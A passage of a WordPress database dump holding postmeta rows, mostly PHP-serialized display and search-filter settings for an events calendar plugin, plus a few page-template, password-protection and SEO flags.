"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(137428,264444,'sf_status','0'),(137429,264444,'sf_display_label','0'),(137430,264444,'show_past_events','1'),(137431,264444,'show_only_past_events','0'),(137432,264444,'show_only_ongoing_events','0'),(137433,264443,'_wp_page_template','default'),(137434,264443,'passster_activate_global_protection',NULL),(137435,264443,'passster_activate_protection',NULL),(137436,264443,'passster_protection_type','password'),(137437,264443,'boldgrid_hide_page_title','0'),(137438,264443,'boldgrid_in_page_containers','1'),(137439,264443,'bgseo_robots_index','index'),(137440,264443,'bgseo_robots_follow','follow'),(137441,264446,'protect_children',''),(137442,264446,'_edit_lock','1620591559:2'),(137443,264446,'_edit_last','2'),(137444,264447,'protect_children',''),(137445,264447,'label',''),(137446,264447,'category','115'),(137447,264447,'location',''),(137448,264447,'organizer',''),(137449,264447,'tag',''),(137450,264447,'author',''),(137451,264447,'skin','monthly_view'),(137452,264447,'sk-options','a:18:{s:4:\"list\";a:30:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";}s:4:\"grid\";a:32:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:6:\"agenda\";a:15:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:13:\"full_calendar\";a:25:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"yearly_view\";a:13:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:12:\"monthly_view\";a:11:{s:5:\"style\";s:6:\"simple\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:11:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"weekly_view\";a:11:{s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:9:\"timetable\";a:15:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:7:\"masonry\";a:18:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:5:\"cover\";a:11:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"264605\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:9:\"countdown\";a:11:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:14:\"available_spot\";a:6:{s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"carousel\";a:21:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:6:\"slider\";a:23:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"timeline\";a:15:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:14:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}}'),(137453,264447,'sf-options','a:11:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholde